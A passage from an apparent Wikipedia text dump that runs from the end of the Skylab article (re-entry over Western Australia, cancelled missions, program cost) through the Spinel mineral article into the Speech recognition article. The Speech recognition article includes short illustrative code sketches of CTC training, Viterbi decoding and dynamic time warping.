by 455 km that was expected to last until at least the early 1980s, based on estimates of the 11-year sunspot cycle that began in 1976.
In 1962, NASA first considered the potential risks of a space station re-entry, but decided not to incorporate a retrorocket system in Skylab due to cost and acceptable risk. The spent 49-ton Saturn V S-II stage that had launched Skylab in 1973 remained in orbit for almost two years and made a controlled re-entry on January 11, 1975. The re-entry was mistimed, however, and the stage came down slightly earlier in its orbit than planned. Solar activity British mathematician Desmond King-Hele of the Royal Aircraft Establishment (RAE) predicted in 1973 that Skylab would de-orbit and crash to Earth in 1979, sooner than NASA's forecast, because of increased solar activity. Greater-than-expected solar activity heated the outer layers of Earth's atmosphere and increased drag on Skylab. By late 1977, NORAD also forecast a re-entry in mid-1979; a National Oceanic and Atmospheric Administration (NOAA) scientist criticized NASA for using an inaccurate model for the second most-intense sunspot cycle in a century, and for ignoring NOAA predictions published in 1976. The re-entry of the USSR's nuclear-powered Cosmos 954 in January 1978, and the resulting radioactive debris fall in northern Canada, drew more attention to Skylab's orbit. Although Skylab did not contain radioactive materials, the State Department warned NASA about the potential diplomatic repercussions of station debris. Battelle Memorial Institute forecast that up to 25 tons of metal debris could land in 500 pieces over a long, narrow footprint. The lead-lined film vault, for example, might reach the ground intact. Ground controllers re-established contact with Skylab in March 1978 and recharged its batteries. Although NASA worked on plans to reboost Skylab with the Space Shuttle through 1978 and the TRS was almost complete, the agency gave up in December 1978 when it became clear that the shuttle would not be ready in time; its first flight, STS-1, did not occur until April 1981. Also rejected were proposals to launch the TRS using one or two uncrewed rockets or to attempt to destroy the station with missiles. Re-entry and debris Skylab's impending demise in 1979 was an international media event, with T-shirts and hats bearing bullseyes, "Skylab Repellent" with a money-back guarantee, wagering on the time and place of re-entry, and nightly news reports. The San Francisco Examiner offered a US$10,000 prize for the first piece of Skylab delivered to its offices; the rival San Francisco Chronicle offered US$200,000 if a subscriber suffered personal or property damage. A Nebraska neighborhood painted a target so that the station would have "something to aim for", a resident said. The Examiner created the prize to compete with the Chronicle and its popular columnist Herb Caen. Publisher Reg Murphy was reluctant to pay the money, Jeff Jarvis recalled, but NASA assured Jarvis, Caen's counterpart at the Examiner, that the station would not hit land. A report commissioned by NASA calculated the odds at 1 in 152 of debris hitting any human, and 1 in 7 of debris hitting a city of 100,000 people or more. Special teams were readied to head to any country hit by debris. The event caused so much panic in the Philippines that President Ferdinand Marcos appeared on national television to reassure the public. A week before re-entry, NASA forecast that it would occur between July 10 and 14, with the 12th the most likely date; the RAE predicted the 14th.
In the hours before the event, ground controllers adjusted Skylab's orientation to minimize the risk of re-entry over a populated area. They aimed the station at a spot south-southeast of Cape Town, South Africa, and re-entry began at approximately 16:37 UTC on July 11, 1979. The station did not burn up as quickly as NASA expected. Due to a four-percent calculation error, debris landed east of Perth, Western Australia, and was found between Esperance, Western Australia, and Rawlinna, from 31° to 34° S and 122° to 126° E, within roughly a 130–150 km (81–93 mi) radius around Balladonia, Western Australia. Residents and an airline pilot saw dozens of colorful flares as large pieces broke up in the atmosphere; the debris landed in an almost unpopulated area, but the sightings still caused NASA to fear human injury or property damage. In a 2005 interview, Don Lind reported no human injuries or deaths. Stan Thornton found 24 pieces of Skylab at his home in Esperance. After obtaining his first passport, Thornton flew to San Francisco. After waiting one week for the Marshall Space Flight Center to authenticate the wreckage, he collected the Examiner prize and another US$1,000 from a Philadelphia businessman who had flown Thornton's family and girlfriend there. Analysis of the debris showed that the station had disintegrated much lower above the Earth than expected. The Shire of Esperance light-heartedly fined NASA A$400 for littering; although the fine was written off three months later, it was eventually paid on NASA's behalf in April 2009, after Scott Barley of Highway Radio raised the funds from his morning show listeners. After the demise of Skylab, NASA focused on the reusable Spacelab module, an orbital workshop that could be deployed with the Space Shuttle and returned to Earth. The next major American space station project was Space Station Freedom, which was merged into the International Space Station program in 1993 and launched starting in 1998. Shuttle–Mir was another project, and led to the US funding Spektr, Priroda, and the Mir Docking Module in the 1990s. Launchers, rescue, and cancelled missions Launchers Launch vehicles: SA-513 (Skylab) SA-206 (Skylab 2) SA-207 (Skylab 3) SA-208 (Skylab 4) SA-209 (Skylab Rescue and Skylab 5, not launched) Skylab Revisit In 1971, before Skylab launched, NASA studied the potential of adding another mission to the three already planned. This study, called Skylab Revisit, examined two options. The first was an open-ended mission that would launch within 30 days after Skylab 4 and aim to last 56 days. The second would visit the station a year after the last crew had left, to determine the health and habitability of the station after two years in space. Neither option was rated highly. The first option's chance of mission success was considered uncertain at best, and the second's even worse, given the expected dearth of food, water, and oxygen and the degraded condition of Skylab's systems after two years in orbit. Skylab Rescue A Skylab Rescue mission was assembled for the second crewed mission to Skylab, but it was not needed. Another rescue mission was assembled for the last Skylab mission and was also on standby for the Apollo–Soyuz Test Project (ASTP). These missions would have used a backup Saturn IB rocket (SA-209) and a CSM (CSM-119). Skylab 5 Skylab 5 would have been a short 20-day mission in April 1974 to conduct more scientific experiments and to use the Apollo CSM's Service Propulsion System engine to boost Skylab into a higher orbit, supporting later station use by the Space Shuttle.
Vance Brand (commander), William B. Lenoir (science pilot), and Don Lind (pilot) would have been the crew for this mission, with Brand and Lind also serving as the prime crew for the Skylab Rescue flights. Brand and Lind additionally trained for a mission that would have aimed Skylab for a controlled deorbit. Skylab 5 would have used the SA-209 rocket and CSM-119 spacecraft kept on standby for Skylab Rescue. Upon the mission's cancellation, the rocket was put on display at NASA's Kennedy Space Center. Skylab B In addition to the flown Skylab space station, a second flight-quality backup Skylab had been built during the program. NASA considered launching it as a second station, to be called Skylab B (S-IVB 515), in May 1973 or later, but decided against it. Launching another Skylab with another Saturn V rocket would have been very costly, and it was decided to spend this money on the development of the Space Shuttle instead. NASA transferred Skylab B to the National Air and Space Museum in 1975. On display in the museum's Space Hall since 1976, the orbital workshop has been slightly modified to permit viewers to walk through the living quarters. Engineering mock-ups A full-size 1G training mock-up once used for astronaut training is located at the Lyndon B. Johnson Space Center visitor center in Houston, Texas. Another training mock-up, originally used at the Neutral Buoyancy Simulator (NBS), is at the U.S. Space & Rocket Center in Huntsville, Alabama. Originally displayed indoors, it was subsequently stored outdoors for several years to make room for other exhibits. To mark the 40th anniversary of the Skylab program, the Orbital Workshop portion of the trainer was restored and moved into the Davidson Center in 2013. Mission designations The numerical identification of the crewed Skylab missions was the cause of some confusion. Originally, the uncrewed launch of Skylab and the three crewed missions to the station were numbered SL-1 through SL-4. During preparations for the crewed missions, some documentation was created with a different scheme – SLM-1 through SLM-3 – for those missions only. William Pogue credits Pete Conrad with asking the Skylab program director which scheme should be used for the mission patches, and the astronauts were told to use 1–2–3, not 2–3–4. By the time NASA administrators tried to reverse this decision, it was too late, as all the in-flight clothing had already been manufactured and shipped with the 1–2–3 mission patches. L.B. James of NASA Marshall predicted in 1970 that each Skylab crew might consist of an astronomer, a medical doctor, and a third scientist. NASA Astronaut Group 4 and NASA Astronaut Group 6 were scientists recruited as astronauts. They and the scientific community hoped to have two on each Skylab mission, but Deke Slayton, director of flight crew operations, insisted that two trained pilots fly on each. Although the scientist-astronauts were qualified jet pilots, NASA headquarters made the final decision, on 6 July 1971, to fly one scientist on each Skylab crew, after the deaths of three cosmonauts on Soyuz 11. Kerwin was the first Skylab scientist-astronaut. NASA chose a medical doctor to better understand the effects of spaceflight on the human body during a long-duration mission. Astronauts trained for minor medical procedures at a Houston hospital emergency department. SMEAT The Skylab Medical Experiment Altitude Test (SMEAT) was a 56-day (8-week) Earth-analog Skylab test. The test used a low-pressure, high-oxygen-percentage atmosphere, but operated under full gravity, as SMEAT was not in orbit.
The test had a three-astronaut crew: Commander Robert Crippen, Pilot Karol J. Bobko, and Science Pilot William E. Thornton. There was a focus on medical studies, and Thornton was an M.D. The crew lived and worked in the pressure chamber, converted to resemble Skylab, from July 26 to September 20, 1972. Program cost From 1966 to 1974, the Skylab program cost a total of US$2.2 billion (about US$10 billion in 2010 dollars). As its three three-person crews spent 510 total man-days in space, each man-day cost approximately US$20 million in 2010 dollars, compared to US$7.5 million for the International Space Station. Depictions in film A minor storyline of the 1986 film Dogs in Space is an attempt by characters in the Melbourne household to fabricate pieces of Skylab and win a radio station's competition to locate debris from the space station as it fell to Earth in Australia. The documentary Searching for Skylab was released online in March 2019. It was written and directed by Dwight Steven-Boniecki and was partly crowdfunded. The alternate-history Apple TV+ original series For All Mankind (2019) depicts the space station surviving into the 1980s and coexisting with the Space Shuttle program in its alternate timeline, appearing in the first episode of the second season. In the 2011 film Skylab, a family gathers in France and waits for the station to fall out of orbit. It was directed by Julie Delpy. The 2021 Indian film Skylab depicts fictitious incidents in a Telangana village preceding the disintegration of the space station. The 2024 series Last Days of the Space Age is set in 1979 Western Australia, during Skylab's re-entry near Perth.
Technology
Crewed vehicles
null
29467
https://en.wikipedia.org/wiki/Spinel
Spinel
Spinel is the magnesium/aluminium member of the larger spinel group of minerals. It has the formula MgAl2O4 and crystallizes in the cubic crystal system. Its name comes from the Latin word spinella, a diminutive form of spina ("spine"), in reference to its pointed crystals. Properties Spinel crystallizes in the isometric system; common crystal forms are octahedra, usually twinned. It has no true cleavage, but shows an octahedral parting and a conchoidal fracture. Its hardness is 8, its specific gravity is 3.5–4.1, and it is transparent to opaque with a vitreous to dull luster. It may be colorless, but is usually various shades of red, lavender, blue, green, brown, black, or yellow. Chromium(III) causes the red color in spinel from Burma. Some spinels are among the most famous gemstones; among them are the Black Prince's Ruby and the "Timur ruby" in the British Crown Jewels, and the "Côte de Bretagne", formerly from the French Crown Jewels. The Samarian Spinel is the largest known spinel in the world. Transparent red spinels were called spinel-rubies or balas rubies. In the past, before the arrival of modern science, spinels and rubies were equally known as rubies. After the 18th century, the word ruby was used only for the red gem variety of the mineral corundum, and the word spinel came to be used for this species. "Balas" is derived from Balascia, the ancient name for Badakhshan, a region in central Asia situated in the upper valley of the Panj River, one of the principal tributaries of the Oxus River. However, "Balascia" itself may be derived from Sanskrit bālasūryaka, which translates as "crimson-coloured morning sun". Mines in the Gorno-Badakhshan region of Tajikistan constituted for centuries the main source of red and pink spinels. Occurrence Geologic occurrence Spinel is found as a metamorphic mineral in metamorphosed limestones and silica-poor mudstones. It also occurs as a primary mineral in rare mafic igneous rocks; in these igneous rocks, the magmas are relatively deficient in alkalis relative to aluminium, and aluminium oxide may form as the mineral corundum or may combine with magnesia to form spinel. This is why spinel and ruby are often found together. The petrogenesis of spinel in mafic magmatic rocks is strongly debated, but it certainly results from the interaction of mafic magma with more evolved magma or rock (e.g. gabbro, troctolite). Spinel (MgAl2O4) is common in peridotite in the uppermost Earth's mantle, between approximately 20 km and approximately 120 km depth, possibly deeper depending on the chromium content. At significantly shallower depths, above the Moho, calcic plagioclase is the more stable aluminous mineral in peridotite, while garnet is the stable phase deeper in the mantle, below the spinel stability region. Spinel is also a common mineral in the Ca-Al-rich inclusions (CAIs) of some chondritic meteorites. Geographical occurrence Spinel has long been found in the gemstone-bearing gravel of Sri Lanka, in the limestones of the Badakshan Province in modern-day Afghanistan and Tajikistan, and of Mogok in Myanmar. Over the last decades, gem-quality spinels have been found in the marbles of Lục Yên District (Vietnam), Mahenge and Matombo (Tanzania), and Tsavo (Kenya), and in the gravels of Tunduru (Tanzania) and Ilakaka (Madagascar). Since 2000, spinels with unusually vivid pink or blue colors have been discovered in several locations around the world. Such "glowing" spinels are known from Mogok (Myanmar), the Mahenge plateau (Tanzania), Lục Yên District (Vietnam), and several other localities.
In 2018, bright blue spinels were also reported from the southern part of Baffin Island (Canada). The pure blue coloration of spinel is caused by small additions of cobalt. Synthetic spinel Synthetic spinel can be produced by methods similar to those used for synthetic corundum, including the Verneuil method and the flux method pioneered by Edmond Frémy. It is widely used as an inexpensive cut gem in birthstone jewelry for the month of August. Light blue synthetic spinel is a good imitation of aquamarine beryl, and green synthetic spinel is used as an emerald or tourmaline simulant. By 2015, transparent spinel was being made in sheets and other shapes through sintering. Synthetic spinel, which looks like glass but has notably higher strength against pressure, also has applications in military and commercial use.
Physical sciences
Minerals
Earth science
29468
https://en.wikipedia.org/wiki/Speech%20recognition
Speech recognition
Speech recognition is an interdisciplinary subfield of computer science and computational linguistics that develops methodologies and technologies enabling the recognition and translation of spoken language into text by computers. It is also known as automatic speech recognition (ASR), computer speech recognition, or speech-to-text (STT). It incorporates knowledge and research from the computer science, linguistics, and computer engineering fields. The reverse process is speech synthesis. Some speech recognition systems require "training" (also called "enrollment"), where an individual speaker reads text or isolated vocabulary into the system. The system analyzes the person's specific voice and uses it to fine-tune the recognition of that person's speech, resulting in increased accuracy. Systems that do not use training are called "speaker-independent" systems; systems that use training are called "speaker-dependent". Speech recognition applications include voice user interfaces such as voice dialing (e.g. "call home"), call routing (e.g. "I would like to make a collect call"), domotic appliance control, keyword search (e.g. finding a podcast where particular words were spoken), simple data entry (e.g., entering a credit card number), preparation of structured documents (e.g. a radiology report), determining speaker characteristics, speech-to-text processing (e.g., word processors or emails), and aircraft control (usually termed direct voice input). Automatic pronunciation assessment is used in education, for example for spoken language learning. The term voice recognition or speaker identification refers to identifying the speaker, rather than what they are saying. Recognizing the speaker can simplify the task of translating speech in systems that have been trained on a specific person's voice, or it can be used to authenticate or verify the identity of a speaker as part of a security process. From the technology perspective, speech recognition has a long history with several waves of major innovations. Most recently, the field has benefited from advances in deep learning and big data. The advances are evidenced not only by the surge of academic papers published in the field, but more importantly by the worldwide industry adoption of a variety of deep learning methods in designing and deploying speech recognition systems. History The key areas of growth were vocabulary size, speaker independence, and processing speed. Pre-1970 1952 – Three Bell Labs researchers, Stephen Balashek, R. Biddulph, and K. H. Davis, built a system called "Audrey" for single-speaker digit recognition. Their system located the formants in the power spectrum of each utterance. 1960 – Gunnar Fant developed and published the source-filter model of speech production. 1962 – IBM demonstrated its 16-word "Shoebox" machine's speech recognition capability at the 1962 World's Fair. 1966 – Linear predictive coding (LPC), a speech coding method, was first proposed by Fumitada Itakura of Nagoya University and Shuzo Saito of Nippon Telegraph and Telephone (NTT), while working on speech recognition. 1969 – Funding at Bell Labs dried up for several years when the influential John Pierce wrote an open letter that was critical of speech recognition research and defunded it. This defunding lasted until Pierce retired and James L. Flanagan took over. Raj Reddy was the first person to take on continuous speech recognition, as a graduate student at Stanford University in the late 1960s. Previous systems had required users to pause after each word.
Reddy's system accepted spoken commands for playing chess. Around this time Soviet researchers invented the dynamic time warping (DTW) algorithm and used it to create a recognizer capable of operating on a 200-word vocabulary. DTW processed speech by dividing it into short frames, e.g. 10 ms segments, and processing each frame as a single unit. Although DTW would be superseded by later algorithms, the technique carried on. Achieving speaker independence remained unsolved during this period. 1970–1990 1971 – DARPA funded five years of Speech Understanding Research, speech recognition research seeking a minimum vocabulary size of 1,000 words. They thought speech understanding would be key to making progress in speech recognition, but this later proved untrue. BBN, IBM, Carnegie Mellon and Stanford Research Institute all participated in the program. This revived speech recognition research after John Pierce's letter. 1972 – The IEEE Acoustics, Speech, and Signal Processing group held a conference in Newton, Massachusetts. 1976 – The first ICASSP was held in Philadelphia, which since then has been a major venue for the publication of research on speech recognition. During the late 1960s Leonard Baum developed the mathematics of Markov chains at the Institute for Defense Analyses. A decade later, at CMU, Raj Reddy's students James Baker and Janet M. Baker began using the hidden Markov model (HMM) for speech recognition. James Baker had learned about HMMs from a summer job at the Institute for Defense Analyses during his undergraduate education. The use of HMMs allowed researchers to combine different sources of knowledge, such as acoustics, language, and syntax, in a unified probabilistic model. By the mid-1980s IBM's Fred Jelinek's team created a voice-activated typewriter called Tangora, which could handle a 20,000-word vocabulary. Jelinek's statistical approach put less emphasis on emulating the way the human brain processes and understands speech, in favor of statistical modeling techniques such as HMMs. (Jelinek's group independently discovered the application of HMMs to speech.) This was controversial with linguists, since HMMs are too simplistic to account for many common features of human languages. However, the HMM proved to be a highly useful way of modeling speech, and it replaced dynamic time warping to become the dominant speech recognition algorithm in the 1980s. 1982 – Dragon Systems, founded by James and Janet M. Baker, was one of IBM's few competitors. Practical speech recognition The 1980s also saw the introduction of the n-gram language model. 1987 – The back-off model allowed language models to use n-grams of multiple lengths, and CSELT used HMMs to recognize languages (both in software and in specialized hardware processors, e.g. RIPAC). Much of the progress in the field is owed to the rapidly increasing capabilities of computers. At the end of the DARPA program in 1976, the best computer available to researchers was the PDP-10 with 4 MB of RAM. It could take up to 100 minutes to decode just 30 seconds of speech. Practical products of the era included: 1984 – the Apricot Portable was released, with support for up to 4,096 words, of which only 64 could be held in RAM at a time. 1987 – a recognizer from Kurzweil Applied Intelligence. 1990 – Dragon Dictate, a consumer product, was released. AT&T deployed the Voice Recognition Call Processing service in 1992 to route telephone calls without the use of a human operator. The technology was developed by Lawrence Rabiner and others at Bell Labs.
By this point, the vocabulary of the typical commercial speech recognition system was larger than the average human vocabulary. Raj Reddy's former student, Xuedong Huang, developed the Sphinx-II system at CMU. The Sphinx-II system was the first to do speaker-independent, large-vocabulary, continuous speech recognition, and it had the best performance in DARPA's 1992 evaluation. Handling continuous speech with a large vocabulary was a major milestone in the history of speech recognition. Huang went on to found the speech recognition group at Microsoft in 1993. Raj Reddy's student Kai-Fu Lee joined Apple where, in 1992, he helped develop a speech interface prototype for the Apple computer known as Casper. Lernout & Hauspie, a Belgium-based speech recognition company, acquired several other companies, including Kurzweil Applied Intelligence in 1997 and Dragon Systems in 2000. The L&H speech technology was used in the Windows XP operating system. L&H was an industry leader until an accounting scandal brought an end to the company in 2001. The speech technology from L&H was bought by ScanSoft, which became Nuance in 2005. Apple originally licensed software from Nuance to provide speech recognition capability to its digital assistant Siri. 2000s In the 2000s DARPA sponsored two speech recognition programs: Effective Affordable Reusable Speech-to-Text (EARS) in 2002 and Global Autonomous Language Exploitation (GALE). Four teams participated in the EARS program: IBM, a team led by BBN with LIMSI and the University of Pittsburgh, Cambridge University, and a team composed of ICSI, SRI and the University of Washington. EARS funded the collection of the Switchboard telephone speech corpus, containing 260 hours of recorded conversations from over 500 speakers. The GALE program focused on Arabic and Mandarin broadcast news speech. Google's first effort at speech recognition came in 2007, after hiring some researchers from Nuance. The first product was GOOG-411, a telephone-based directory service. The recordings from GOOG-411 produced valuable data that helped Google improve its recognition systems. Google Voice Search is now supported in over 30 languages. In the United States, the National Security Agency has made use of a type of speech recognition for keyword spotting since at least 2006. This technology allows analysts to search through large volumes of recorded conversations and isolate mentions of keywords. Recordings can be indexed, and analysts can run queries over the database to find conversations of interest. Some government research programs focused on intelligence applications of speech recognition, e.g. DARPA's EARS program and IARPA's Babel program. In the early 2000s, speech recognition was still dominated by traditional approaches such as hidden Markov models combined with feedforward artificial neural networks. Today, however, many aspects of speech recognition have been taken over by a deep learning method called long short-term memory (LSTM), a recurrent neural network published by Sepp Hochreiter and Jürgen Schmidhuber in 1997. LSTM RNNs avoid the vanishing gradient problem and can learn "Very Deep Learning" tasks that require memories of events that happened thousands of discrete time steps earlier, which is important for speech. Around 2007, LSTM trained by connectionist temporal classification (CTC) started to outperform traditional speech recognition in certain applications.
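To give a flavor of this architecture, the following is a minimal sketch of a recurrent acoustic model trained with the CTC loss; it is an illustration, not any of the historical systems described here. It assumes PyTorch is available, and the feature dimension, label inventory, and data are placeholder assumptions.

# Minimal sketch of a CTC-trained recurrent acoustic model (illustrative
# assumptions only). Requires PyTorch; all sizes are arbitrary demo choices.
import torch
import torch.nn as nn

NUM_FEATS = 40     # e.g. per-frame acoustic features (assumption)
NUM_LABELS = 29    # e.g. 28 output symbols + 1 CTC "blank" (assumption)

class CTCAcousticModel(nn.Module):
    def __init__(self):
        super().__init__()
        self.lstm = nn.LSTM(NUM_FEATS, 128, num_layers=2, bidirectional=True)
        self.proj = nn.Linear(2 * 128, NUM_LABELS)

    def forward(self, feats):                  # feats: (time, batch, NUM_FEATS)
        hidden, _ = self.lstm(feats)
        return self.proj(hidden).log_softmax(dim=-1)   # (time, batch, labels)

model = CTCAcousticModel()
ctc = nn.CTCLoss(blank=0)                      # label 0 reserved for blank

feats = torch.randn(100, 1, NUM_FEATS)         # 100 frames of fake input
targets = torch.tensor([[5, 12, 9]])           # fake label sequence
log_probs = model(feats)
loss = ctc(log_probs, targets,
           torch.tensor([100]),                # input length in frames
           torch.tensor([3]))                  # target length in labels
loss.backward()                                # gradients for training

The CTC loss lets the network learn frame-to-label alignments on its own, which is exactly what removed the need for pre-segmented training data in this line of work.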
In 2015, Google's speech recognition reportedly experienced a dramatic performance jump of 49% through CTC-trained LSTM, which became available through Google Voice to all smartphone users. Transformers, a type of neural network based solely on "attention", have been widely adopted in computer vision and language modeling, sparking interest in adapting such models to new domains, including speech recognition. Some recent papers have reported superior performance using transformer models for speech recognition, but these models usually require large-scale training datasets to reach high performance levels. The use of deep feedforward (non-recurrent) networks for acoustic modeling was introduced during the later part of 2009 by Geoffrey Hinton and his students at the University of Toronto and by Li Deng and colleagues at Microsoft Research, initially in collaborative work between Microsoft and the University of Toronto, which was subsequently expanded to include IBM and Google (hence the "The shared views of four research groups" subtitle of their 2012 review paper). A Microsoft research executive called this innovation "the most dramatic change in accuracy since 1979". In contrast to the steady incremental improvements of the past few decades, the application of deep learning decreased the word error rate by 30%. This innovation was quickly adopted across the field. Researchers have begun to use deep learning techniques for language modeling as well. In the long history of speech recognition, both shallow and deep forms (e.g. recurrent nets) of artificial neural networks had been explored for many years during the 1980s, 1990s, and a few years into the 2000s. But these methods never won out over the non-uniform, internally handcrafted Gaussian mixture model/hidden Markov model (GMM-HMM) technology based on generative models of speech trained discriminatively. A number of key difficulties had been methodologically analyzed in the 1990s, including gradient diminishing and weak temporal correlation structure in the neural predictive models. All these difficulties were in addition to the lack of big training data and big computing power in those early days. Most speech recognition researchers who understood such barriers subsequently moved away from neural nets to pursue generative modeling approaches, until the recent resurgence of deep learning starting around 2009–2010 that overcame all these difficulties. Hinton et al. and Deng et al. reviewed part of this recent history about how their collaboration with each other, and then with colleagues across four groups (University of Toronto, Microsoft, Google, and IBM), ignited a renaissance of applications of deep feedforward neural networks for speech recognition. 2010s By the early 2010s speech recognition, also called voice recognition, was clearly differentiated from speaker recognition, and speaker independence was considered a major breakthrough. Until then, systems had required a "training" period. A 1987 ad for a doll had carried the tagline "Finally, the doll that understands you." – despite the fact that it was described as one "which children could train to respond to their voice". In 2017, Microsoft researchers reached a historic human-parity milestone of transcribing conversational telephony speech on the widely benchmarked Switchboard task. Multiple deep learning models were used to optimize speech recognition accuracy.
The speech recognition word error rate was reported to be as low as that of four professional human transcribers working together on the same benchmark, which was funded by the IBM Watson speech team on the same task. Models, methods, and algorithms Both acoustic modeling and language modeling are important parts of modern statistically based speech recognition algorithms. Hidden Markov models (HMMs) are widely used in many systems. Language modeling is also used in many other natural language processing applications such as document classification or statistical machine translation. Hidden Markov models Modern general-purpose speech recognition systems are based on hidden Markov models. These are statistical models that output a sequence of symbols or quantities. HMMs are used in speech recognition because a speech signal can be viewed as a piecewise stationary signal or a short-time stationary signal. On a short time scale (e.g., 10 milliseconds), speech can be approximated as a stationary process. Speech can be thought of as a Markov model for many stochastic purposes. Another reason why HMMs are popular is that they can be trained automatically and are simple and computationally feasible to use. In speech recognition, the hidden Markov model would output a sequence of n-dimensional real-valued vectors (with n being a small integer, such as 10), outputting one of these every 10 milliseconds. The vectors would consist of cepstral coefficients, which are obtained by taking a Fourier transform of a short time window of speech, decorrelating the spectrum using a cosine transform, and then taking the first (most significant) coefficients. The hidden Markov model will tend to have in each state a statistical distribution that is a mixture of diagonal-covariance Gaussians, which will give a likelihood for each observed vector. Each word, or (for more general speech recognition systems) each phoneme, will have a different output distribution; a hidden Markov model for a sequence of words or phonemes is made by concatenating the individually trained hidden Markov models for the separate words and phonemes. Described above are the core elements of the most common HMM-based approach to speech recognition. Modern speech recognition systems use various combinations of a number of standard techniques in order to improve results over the basic approach described above. A typical large-vocabulary system would need context dependency for the phonemes (so that phonemes with different left and right context would have different realizations as HMM states); it would use cepstral normalization to normalize for different speakers and recording conditions; for further speaker normalization, it might use vocal tract length normalization (VTLN) for male-female normalization and maximum likelihood linear regression (MLLR) for more general speaker adaptation. The features would have so-called delta and delta-delta coefficients to capture speech dynamics and, in addition, might use heteroscedastic linear discriminant analysis (HLDA); or might skip the delta and delta-delta coefficients and use splicing and an LDA-based projection, followed perhaps by heteroscedastic linear discriminant analysis or a global semi-tied covariance transform (also known as maximum likelihood linear transform, or MLLT). Many systems use so-called discriminative training techniques that dispense with a purely statistical approach to HMM parameter estimation and instead optimize some classification-related measure of the training data. Examples are maximum mutual information (MMI), minimum classification error (MCE), and minimum phone error (MPE). Decoding of the speech (the term for what happens when the system is presented with a new utterance and must compute the most likely source sentence) would probably use the Viterbi algorithm to find the best path, and here there is a choice between dynamically creating a combination hidden Markov model, which includes both the acoustic and language model information, and combining it statically beforehand (the finite state transducer, or FST, approach). A possible improvement to decoding is to keep a set of good candidates instead of just the best candidate, and to use a better scoring function (rescoring) to rate these candidates so that the best one may be picked according to this refined score. The set of candidates can be kept either as a list (the N-best list approach) or as a subset of the models (a lattice). Rescoring is usually done by trying to minimize the Bayes risk (or an approximation thereof): instead of taking the source sentence with maximal probability, we try to take the sentence that minimizes the expectation of a given loss function with regard to all possible transcriptions (i.e., we take the sentence that minimizes the average distance to other possible sentences weighted by their estimated probability). The loss function is usually the Levenshtein distance, though it can be a different distance for specific tasks; the set of possible transcriptions is, of course, pruned to maintain tractability. Efficient algorithms have been devised to rescore lattices represented as weighted finite state transducers, with edit distances represented themselves as finite state transducers verifying certain assumptions.
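As an illustration of the decoding step just described, here is a minimal, self-contained sketch of the Viterbi algorithm over a toy HMM. It is a didactic example under stated assumptions, not a production decoder: the states, transition probabilities, and emission scores are made-up placeholders, and a real recognizer would operate over composed acoustic, lexicon, and language models.

# Minimal Viterbi decoder over a toy HMM (illustrative numbers only).
import numpy as np

def viterbi(log_init, log_trans, log_emit):
    # log_init: (S,) initial state log-probabilities
    # log_trans: (S, S) transition log-probabilities, row = from-state
    # log_emit: (T, S) per-frame emission log-likelihoods
    # Returns the most likely state sequence and its log-score.
    T, S = log_emit.shape
    score = log_init + log_emit[0]         # best score ending in each state
    back = np.zeros((T, S), dtype=int)     # backpointers for path recovery
    for t in range(1, T):
        cand = score[:, None] + log_trans  # score of every (prev, cur) step
        back[t] = cand.argmax(axis=0)      # best predecessor for each state
        score = cand.max(axis=0) + log_emit[t]
    path = [int(score.argmax())]
    for t in range(T - 1, 0, -1):          # trace backpointers from the end
        path.append(int(back[t, path[-1]]))
    return path[::-1], float(score.max())

# Toy two-state example with made-up numbers:
path, best = viterbi(
    np.log([0.6, 0.4]),
    np.log([[0.7, 0.3], [0.4, 0.6]]),
    np.log([[0.9, 0.2], [0.1, 0.8], [0.2, 0.7]]),
)
print(path, best)   # -> [0, 1, 1] and its log-probability

Working in the log domain avoids numerical underflow, which is the standard trick when chaining many small probabilities over long utterances.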
Dynamic time warping (DTW)-based speech recognition Dynamic time warping is an approach that was historically used for speech recognition but has now largely been displaced by the more successful HMM-based approach. Dynamic time warping is an algorithm for measuring similarity between two sequences that may vary in time or speed. For instance, similarities in walking patterns would be detected, even if in one video the person was walking slowly and in another he or she was walking more quickly, or even if there were accelerations and decelerations during the course of one observation. DTW has been applied to video, audio, and graphics – indeed, any data that can be turned into a linear representation can be analyzed with DTW. A well-known application has been automatic speech recognition, to cope with different speaking speeds. In general, it is a method that allows a computer to find an optimal match between two given sequences (e.g., time series) with certain restrictions; that is, the sequences are "warped" non-linearly to match each other. This sequence alignment method is often used in the context of hidden Markov models.
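To make the warping idea concrete, the following minimal sketch computes a DTW alignment cost between two feature sequences using the classic dynamic-programming recurrence. It is an illustration under assumed toy data, not a historical recognizer; real systems add slope and band constraints to keep the warp plausible.

# Minimal dynamic time warping distance between two feature sequences.
import numpy as np

def dtw_distance(a, b):
    # a: (n, d) and b: (m, d) sequences of feature vectors.
    # Returns the cost of the best non-linear alignment of a against b.
    n, m = len(a), len(b)
    cost = np.full((n + 1, m + 1), np.inf)
    cost[0, 0] = 0.0
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            d = np.linalg.norm(a[i - 1] - b[j - 1])  # local frame distance
            # extend the cheapest of: diagonal match, or a warping step
            cost[i, j] = d + min(cost[i - 1, j - 1],
                                 cost[i - 1, j],
                                 cost[i, j - 1])
    return float(cost[n, m])

# Toy example: the same "utterance" at two speaking rates still aligns cheaply.
slow = np.array([[0.0], [0.0], [1.0], [1.0], [2.0], [2.0]])
fast = np.array([[0.0], [1.0], [2.0]])
print(dtw_distance(slow, fast))   # 0.0 – a perfect warped alignment

In an isolated-word recognizer of this era, each stored template would be compared to the incoming utterance this way, and the template with the lowest alignment cost would be chosen.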
Neural networks Neural networks emerged as an attractive acoustic modeling approach in ASR in the late 1980s. Since then, neural networks have been used in many aspects of speech recognition, such as phoneme classification, phoneme classification through multi-objective evolutionary algorithms, isolated word recognition, audiovisual speech recognition, audiovisual speaker recognition, and speaker adaptation. Neural networks make fewer explicit assumptions about feature statistical properties than HMMs and have several qualities that make them attractive recognition models for speech recognition. When used to estimate the probabilities of a speech feature segment, neural networks allow discriminative training in a natural and efficient manner. However, in spite of their effectiveness in classifying short-time units such as individual phonemes and isolated words, early neural networks were rarely successful for continuous recognition tasks because of their limited ability to model temporal dependencies. One approach to this limitation was to use neural networks as a pre-processing step (feature transformation or dimensionality reduction) prior to HMM-based recognition. More recently, however, LSTM and related recurrent neural networks (RNNs), time delay neural networks (TDNNs), and transformers have demonstrated improved performance in this area. Deep feedforward and recurrent neural networks Deep neural networks and denoising autoencoders are also under investigation. A deep feedforward neural network (DNN) is an artificial neural network with multiple hidden layers of units between the input and output layers. Similar to shallow neural networks, DNNs can model complex non-linear relationships. DNN architectures generate compositional models, where extra layers enable the composition of features from lower layers, giving a huge learning capacity and thus the potential to model complex patterns of speech data. A success of DNNs in large-vocabulary speech recognition occurred in 2010, when industrial researchers, in collaboration with academic researchers, adopted large DNN output layers based on context-dependent HMM states constructed by 